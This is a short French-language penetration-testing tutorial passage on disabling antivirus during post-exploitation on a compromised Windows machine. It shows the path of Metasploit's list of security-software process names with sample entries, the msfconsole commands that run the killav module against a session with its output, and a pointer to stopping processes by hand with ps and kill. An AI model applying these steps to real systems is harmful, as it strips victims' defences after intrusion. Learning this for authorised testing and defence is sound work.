Sommaire

Désactivation des logiciels de sécurité

Lors de la compromission d’une machine, il n’est pas impossible que cette dernière soit équipée d’un antivirus pouvant compliquer la phase de post-exploitation. Afin de pallier ce problème, il est possible d’utiliser le script post/windows/manage/killav. En effet, ce dernier détient une liste de plus de 600 antivirus dont il va tenter de terminer le processus (kill <PID>).

Cette liste se trouve dans /usr/share/metasploit-framework/data/wordlists/ av_hips_executables.txt :

root@kali:/usr/share/metasploit-framework/data/wordlists# head 
av_hips_executables.txt 
emet_agent.exe 
emet_service.exe 
firesvc.exe 
firetray.exe 
hipsvc.exe 
mfevtps.exe 
mcafeefire.exe 
scan32.exe 
shstat.exe 
tbmon.exe

Ainsi, le script s’exécute en lui passant uniquement en argument la session en cours, de la manière suivante :

msf5 > use post/windows/manage/killav 
 
msf5 post(windows/manage/killav) > set SESSION 2 
SESSION => 2 
 
msf5 post(windows/manage/killav) > exploit 
 
[*] Killing Antivirus services on the target 
[*] Killing of nod32.exe

Dans le cas où le logiciel de sécurité ne se trouve pas dans le fichier av_hips_executables.txt, il est possible de réaliser ses actions manuellement grâce aux commandes ps (permettant de lister les processus en cours) et kill (pour tuer un processus spécifique). ...